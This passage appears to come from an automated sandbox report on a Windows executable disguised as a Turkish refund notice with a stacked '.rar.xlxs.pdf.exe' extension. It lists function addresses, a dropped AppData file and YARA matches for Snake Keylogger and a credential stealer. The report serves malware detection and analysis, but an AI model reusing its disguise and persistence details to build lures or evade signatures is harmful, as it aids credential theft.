Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_09CC7A00 1_2_09CC7A00
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_09CC7190 1_2_09CC7190
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_09CC90A8 1_2_09CC90A8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_09CC0268 1_2_09CC0268
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_09CC0278 1_2_09CC0278
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_09CC75C8 1_2_09CC75C8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_09CC44E0 1_2_09CC44E0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_09CC07C0 1_2_09CC07C0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_09CC07AF 1_2_09CC07AF
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 1_2_09CC6649 1_2_09CC6649
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_01167118 14_2_01167118
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_0116C148 14_2_0116C148
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_0116A088 14_2_0116A088
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_01165362 14_2_01165362
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_0116D278 14_2_0116D278
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_0116C468 14_2_0116C468
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_0116C738 14_2_0116C738
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_0116E988 14_2_0116E988
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_011669B0 14_2_011669B0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_0116CA08 14_2_0116CA08
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_0116CCD8 14_2_0116CCD8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_0116CFAA 14_2_0116CFAA
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_0116E97A 14_2_0116E97A
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_0116F961 14_2_0116F961
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_011629E0 14_2_011629E0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_01163E09 14_2_01163E09
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A8FB0 14_2_058A8FB0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AEE70 14_2_058AEE70
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A81D0 14_2_058A81D0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A7B78 14_2_058A7B78
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A15E8 14_2_058A15E8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A15F8 14_2_058A15F8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AA528 14_2_058AA528
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AA538 14_2_058AA538
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A0D39 14_2_058A0D39
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A0D48 14_2_058A0D48
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AE540 14_2_058AE540
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AE550 14_2_058AE550
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AC550 14_2_058AC550
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AC560 14_2_058AC560
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A6488 14_2_058A6488
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A0489 14_2_058A0489
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A0498 14_2_058A0498
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AFC20 14_2_058AFC20
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058ADC21 14_2_058ADC21
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058ABC33 14_2_058ABC33
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058ADC30 14_2_058ADC30
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058ABC40 14_2_058ABC40
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A3450 14_2_058A3450
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A3460 14_2_058A3460
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A6478 14_2_058A6478
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AD78F 14_2_058AD78F
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A5780 14_2_058A5780
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AF780 14_2_058AF780
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AF790 14_2_058AF790
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AD7A0 14_2_058AD7A0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AB7A0 14_2_058AB7A0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A8FA1 14_2_058A8FA1
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AB7B0 14_2_058AB7B0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A2FF9 14_2_058A2FF9
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A7710 14_2_058A7710
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A7720 14_2_058A7720
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A2749 14_2_058A2749
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A2758 14_2_058A2758
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A5770 14_2_058A5770
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058ACE80 14_2_058ACE80
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A1E98 14_2_058A1E98
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A1EA8 14_2_058A1EA8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A4EC0 14_2_058A4EC0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A4ED0 14_2_058A4ED0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A4610 14_2_058A4610
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A4620 14_2_058A4620
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AEE5F 14_2_058AEE5F
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058ACE6F 14_2_058ACE6F
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A6E72 14_2_058A6E72
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A6E70 14_2_058A6E70
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A1190 14_2_058A1190
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A11A0 14_2_058A11A0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AE9D0 14_2_058AE9D0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AE9E0 14_2_058AE9E0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AC9E0 14_2_058AC9E0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AC9F0 14_2_058AC9F0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AE0AF 14_2_058AE0AF
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A38B8 14_2_058A38B8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AC0BF 14_2_058AC0BF
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AE0C0 14_2_058AE0C0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AC0D0 14_2_058AC0D0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A08E0 14_2_058A08E0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A08F0 14_2_058A08F0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A3008 14_2_058A3008
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A0006 14_2_058A0006
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A3007 14_2_058A3007
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A6022 14_2_058A6022
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A6030 14_2_058A6030
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A0040 14_2_058A0040
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A2BA0 14_2_058A2BA0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A2BB0 14_2_058A2BB0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A5BD8 14_2_058A5BD8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AB30F 14_2_058AB30F
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A2300 14_2_058A2300
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AF300 14_2_058AF300
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A531A 14_2_058A531A
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AD310 14_2_058AD310
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A5328 14_2_058A5328
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AB320 14_2_058AB320
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A7B69 14_2_058A7B69
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A72B8 14_2_058A72B8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A72C8 14_2_058A72C8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AF2EF 14_2_058AF2EF
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058AD2FF 14_2_058AD2FF
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A22F0 14_2_058A22F0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A6A18 14_2_058A6A18
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A1A41 14_2_058A1A41
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A1A50 14_2_058A1A50
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A4A68 14_2_058A4A68
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Code function: 14_2_058A4A78 14_2_058A4A78
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_0267D5DC 16_2_0267D5DC
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_04E36FE8 16_2_04E36FE8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_04E30040 16_2_04E30040
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_04E3001F 16_2_04E3001F
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_04E36FD8 16_2_04E36FD8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_09267A00 16_2_09267A00
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_09269A48 16_2_09269A48
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_09269A58 16_2_09269A58
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_09267190 16_2_09267190
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_092690A8 16_2_092690A8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_09260268 16_2_09260268
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_09260278 16_2_09260278
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_092675C8 16_2_092675C8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_092607AF 16_2_092607AF
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 16_2_092607C0 16_2_092607C0
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C3D278 20_2_02C3D278
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C35362 20_2_02C35362
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C3A088 20_2_02C3A088
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C3C147 20_2_02C3C147
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C37118 20_2_02C37118
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C3C738 20_2_02C3C738
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C3C468 20_2_02C3C468
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C3CA08 20_2_02C3CA08
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C369A0 20_2_02C369A0
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C3CFAA 20_2_02C3CFAA
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C3CCD8 20_2_02C3CCD8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C3EC18 20_2_02C3EC18
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C3F7F1 20_2_02C3F7F1
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C33AC3 20_2_02C33AC3
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C33A27 20_2_02C33A27
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C33B67 20_2_02C33B67
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C33B0F 20_2_02C33B0F
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C33E09 20_2_02C33E09
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C3FC4F 20_2_02C3FC4F
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_02C3EC0A 20_2_02C3EC0A
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A79ED8 20_2_06A79ED8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A797B0 20_2_06A797B0
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A72288 20_2_06A72288
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A75290 20_2_06A75290
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A71BA8 20_2_06A71BA8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A70B30 20_2_06A70B30
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A72970 20_2_06A72970
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7F620 20_2_06A7F620
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A78E08 20_2_06A78E08
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7F610 20_2_06A7F610
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A79E71 20_2_06A79E71
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7D7A8 20_2_06A7D7A8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7D7B8 20_2_06A7D7B8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7CF08 20_2_06A7CF08
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7E4B2 20_2_06A7E4B2
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7E4C0 20_2_06A7E4C0
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7DC01 20_2_06A7DC01
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7DC10 20_2_06A7DC10
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A79590 20_2_06A79590
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A78DF9 20_2_06A78DF9
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7ED60 20_2_06A7ED60
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7ED70 20_2_06A7ED70
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A75280 20_2_06A75280
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7FA6A 20_2_06A7FA6A
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7FA78 20_2_06A7FA78
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A72278 20_2_06A72278
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A71B97 20_2_06A71B97
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A70B20 20_2_06A70B20
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7D360 20_2_06A7D360
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A70013 20_2_06A70013
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7E067 20_2_06A7E067
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7E068 20_2_06A7E068
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A70040 20_2_06A70040
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7F1B9 20_2_06A7F1B9
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7F1C8 20_2_06A7F1C8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7E917 20_2_06A7E917
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A7E918 20_2_06A7E918
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Code function: 20_2_06A72962 20_2_06A72962
Sample file is different than original file name gathered from version info
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1360405295.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000000.1303500210.0000000000982000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNRtD.exeH vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1358331293.00000000010BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1369980266.000000000A000000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3761158105.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000446000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Binary or memory string: OriginalFilenameNRtD.exeH vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Uses 32bit PE files
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
